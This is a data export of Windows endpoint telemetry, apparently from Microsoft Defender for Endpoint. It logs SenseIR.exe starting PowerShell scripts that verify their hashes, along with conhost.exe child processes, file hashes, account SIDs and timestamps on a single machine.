+1408,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:13:47.559946800+00:00,8684,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_a32b019b4546ad90fb5c415f06d740c2d038e1ea.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_a32b019b4546ad90fb5c415f06d740c2d038e1ea.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '44fb24c92002261b2aae76fa1b456afdd6187d4c86b8ad3342e71e3da398bd36')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_a32b019b4546ad90fb5c415f06d740c2d038e1ea.ps1' }""",PortableExecutable,2020-10-09 20:48:24.470101200+00:00,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,452608,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,a11f7b4a8b2803d3570d1016486d3ba8,dfe1329db9957ed24a8704049f159b285a027b049cf5412b30a9b3416981cdf1,e7f872448beb7fd702dac51c4e83b4f90be44155,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:13:37.445122500+00:00,7128,SenseIR.exe,"""SenseIR.exe"" ""OfflineSenseIR"" ""916"" ""eyJ**********""",True,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:13:47.588696700+00:00,2021-06-23 01:15:34.081274900+00:00,56458f4b-cf52-4276-8795-0af9985c96e8,computerpii_0a470890c60768167990033d701e7bd881398861,156413,False,10.7740.19041.1052,False,11540474045172152,,11540474045172156,2021-06-23 01:13:37.445122500+00:00,7128,2021-06-23 01:13:37.445122500+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,7128,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,3851040,2016-08-29 02:24:16+00:00,2021-06-09 01:20:34.374102900+00:00,2021-06-23 01:13:37.446959300+00:00,2021-06-09 01:20:34.273470300+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,997,False,,,,256.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1023,SenseIR.exe,SenseIR.exe,Windows Defender Advanced Threat Protection Sense IR module,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell
+1409,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:13:47.559938600+00:00,17592,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '900f80d1797f704215f1b63ee986972240e47cc081428073b4e11a2046d0cd7d')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' }""",PortableExecutable,2020-10-09 20:48:24.470101200+00:00,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,452608,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,a11f7b4a8b2803d3570d1016486d3ba8,dfe1329db9957ed24a8704049f159b285a027b049cf5412b30a9b3416981cdf1,e7f872448beb7fd702dac51c4e83b4f90be44155,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:13:37.445122500+00:00,7128,SenseIR.exe,"""SenseIR.exe"" ""OfflineSenseIR"" ""916"" ""eyJ**********""",True,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:13:47.588981+00:00,2021-06-23 01:15:34.081309700+00:00,c13aecbb-6675-4c7a-8d77-462d0fbb80a1,computerpii_0a470890c60768167990033d701e7bd881398861,156414,False,10.7740.19041.1052,False,11540474045172152,,11540474045172155,2021-06-23 01:13:37.445122500+00:00,7128,2021-06-23 01:13:37.445122500+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,7128,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,3851040,2016-08-29 02:24:16+00:00,2021-06-09 01:20:34.374102900+00:00,2021-06-23 01:13:37.446959300+00:00,2021-06-09 01:20:34.273470300+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,256.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1023,SenseIR.exe,SenseIR.exe,Windows Defender Advanced Threat Protection Sense IR module,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell
+1410,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:13:47.564594900+00:00,17024,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_dae68ce859a4308f413368cb6dfd7abdfb8d03c1.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_dae68ce859a4308f413368cb6dfd7abdfb8d03c1.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '8e0e822750dde56e280efcfa000e4f7430739f87167ef59a6d3df6d6fa3d6216')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_dae68ce859a4308f413368cb6dfd7abdfb8d03c1.ps1' }""",PortableExecutable,2020-10-09 20:48:24.470101200+00:00,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,452608,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,a11f7b4a8b2803d3570d1016486d3ba8,dfe1329db9957ed24a8704049f159b285a027b049cf5412b30a9b3416981cdf1,e7f872448beb7fd702dac51c4e83b4f90be44155,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:13:37.445122500+00:00,7128,SenseIR.exe,"""SenseIR.exe"" ""OfflineSenseIR"" ""916"" ""eyJ**********""",True,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:13:47.589700200+00:00,2021-06-23 01:15:34.081344800+00:00,04100224-6c4f-4501-bbf4-2bad38a4f5fc,computerpii_0a470890c60768167990033d701e7bd881398861,156415,False,10.7740.19041.1052,False,11540474045172152,,11540474045172157,2021-06-23 01:13:37.445122500+00:00,7128,2021-06-23 01:13:37.445122500+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,7128,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,3851040,2016-08-29 02:24:16+00:00,2021-06-09 01:20:34.374102900+00:00,2021-06-23 01:13:37.446959300+00:00,2021-06-09 01:20:34.273470300+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,256.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1023,SenseIR.exe,SenseIR.exe,Windows Defender Advanced Threat Protection Sense IR module,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell
+1411,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:13:47.568818800+00:00,8116,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:13:47.559938600+00:00,17592,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '900f80d1797f704215f1b63ee986972240e47cc081428073b4e11a2046d0cd7d')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' }""",True,2021-06-23 01:13:37.445122500+00:00,7128,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:13:47.589999800+00:00,2021-06-23 01:15:34.081379600+00:00,ba07dc39-c701-4a9a-9d66-42578e992305,computerpii_0a470890c60768167990033d701e7bd881398861,156416,False,10.7740.19041.1052,False,11540474045172155,,11540474045172158,2021-06-23 01:13:47.559938600+00:00,17592,2021-06-23 01:13:47.559938600+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,17592,128,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-23 00:54:07.191907300+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1412,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:13:47.571067900+00:00,9628,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-23 01:13:47.559946800+00:00,8684,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_a32b019b4546ad90fb5c415f06d740c2d038e1ea.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_a32b019b4546ad90fb5c415f06d740c2d038e1ea.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '44fb24c92002261b2aae76fa1b456afdd6187d4c86b8ad3342e71e3da398bd36')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_a32b019b4546ad90fb5c415f06d740c2d038e1ea.ps1' }""",True,2021-06-23 01:13:37.445122500+00:00,7128,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:13:47.590279900+00:00,2021-06-23 01:15:34.081416200+00:00,87f03e72-8d2f-4dbc-9037-e12335155592,computerpii_0a470890c60768167990033d701e7bd881398861,156417,False,10.7740.19041.1052,False,11540474045172156,,11540474045172159,2021-06-23 01:13:47.559946800+00:00,8684,2021-06-23 01:13:47.559946800+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,8684,128,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-23 00:54:07.191907300+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,,256.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1413,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:13:47.575256+00:00,14364,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:13:47.564594900+00:00,17024,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_dae68ce859a4308f413368cb6dfd7abdfb8d03c1.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_dae68ce859a4308f413368cb6dfd7abdfb8d03c1.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '8e0e822750dde56e280efcfa000e4f7430739f87167ef59a6d3df6d6fa3d6216')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_dae68ce859a4308f413368cb6dfd7abdfb8d03c1.ps1' }""",True,2021-06-23 01:13:37.445122500+00:00,7128,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:13:47.590718300+00:00,2021-06-23 01:15:34.081452+00:00,8e6d82c1-029b-4869-8780-69e25aa4eb19,computerpii_0a470890c60768167990033d701e7bd881398861,156418,False,10.7740.19041.1052,False,11540474045172157,,11540474045172160,2021-06-23 01:13:47.564594900+00:00,17024,2021-06-23 01:13:47.564594900+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,17024,128,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-23 00:54:07.191907300+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1414,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:13:47.661463400+00:00,18736,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-23 01:13:47.559915900+00:00,12400,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_0c36505108f50e52b1b2c8c0e1e6368501a61293.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_0c36505108f50e52b1b2c8c0e1e6368501a61293.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '1fa227bd0867edfce90eb510f261e723918795c6adcc290e0731f442391b58c3')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_0c36505108f50e52b1b2c8c0e1e6368501a61293.ps1' }""",True,2021-06-23 01:13:37.445122500+00:00,7128,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:13:47.717616+00:00,2021-06-23 01:15:34.081805200+00:00,a066d5fa-0224-48e9-bde1-962d7b2f97f8,computerpii_0a470890c60768167990033d701e7bd881398861,156428,False,10.7740.19041.1052,False,11540474045172154,,11540474045172161,2021-06-23 01:13:47.559915900+00:00,12400,2021-06-23 01:13:47.559915900+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,12400,128,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-23 00:54:07.191907300+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,,256.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1415,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:13:57.527428600+00:00,16488,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_9a4aa4c4b80a29e4911ffd3f764b6a7b37646a69.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_9a4aa4c4b80a29e4911ffd3f764b6a7b37646a69.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq 'd462b7dd8c14155a7b292b44ca1247799ccf6854250dfa7c4bd544b4a9dd32ff')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_9a4aa4c4b80a29e4911ffd3f764b6a7b37646a69.ps1' }""",PortableExecutable,2020-10-09 20:48:24.470101200+00:00,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,452608,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,a11f7b4a8b2803d3570d1016486d3ba8,dfe1329db9957ed24a8704049f159b285a027b049cf5412b30a9b3416981cdf1,e7f872448beb7fd702dac51c4e83b4f90be44155,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:13:37.445122500+00:00,7128,SenseIR.exe,"""SenseIR.exe"" ""OfflineSenseIR"" ""916"" ""eyJ**********""",True,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:13:57.551991900+00:00,2021-06-23 01:15:27.760273100+00:00,99edbb64-c9f7-4b09-a631-adf003bde04c,computerpii_0a470890c60768167990033d701e7bd881398861,157039,False,10.7740.19041.1052,False,11540474045172152,,11540474045172228,2021-06-23 01:13:37.445122500+00:00,7128,2021-06-23 01:13:37.445122500+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,7128,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,3851040,2016-08-29 02:24:16+00:00,2021-06-09 01:20:34.374102900+00:00,2021-06-23 01:13:37.446959300+00:00,2021-06-09 01:20:34.273470300+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,256.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1023,SenseIR.exe,SenseIR.exe,Windows Defender Advanced Threat Protection Sense IR module,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell
+1416,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:13:57.526611300+00:00,5804,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_205d42406d952a4bd6298fd0e29dbbaf16432c34.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_205d42406d952a4bd6298fd0e29dbbaf16432c34.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq 'f0b41859ecfcc7e2c4b373a9dd342e031417c46b56e82cd49f62920397e4c015')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_205d42406d952a4bd6298fd0e29dbbaf16432c34.ps1' }""",PortableExecutable,2020-10-09 20:48:24.470101200+00:00,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,452608,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,a11f7b4a8b2803d3570d1016486d3ba8,dfe1329db9957ed24a8704049f159b285a027b049cf5412b30a9b3416981cdf1,e7f872448beb7fd702dac51c4e83b4f90be44155,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:13:37.445122500+00:00,7128,SenseIR.exe,"""SenseIR.exe"" ""OfflineSenseIR"" ""916"" ""eyJ**********""",True,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:13:57.552412900+00:00,2021-06-23 01:15:27.760337900+00:00,8116f644-6cc7-46c3-92b4-7f9467a6eb99,computerpii_0a470890c60768167990033d701e7bd881398861,157040,False,10.7740.19041.1052,False,11540474045172152,,11540474045172227,2021-06-23 01:13:37.445122500+00:00,7128,2021-06-23 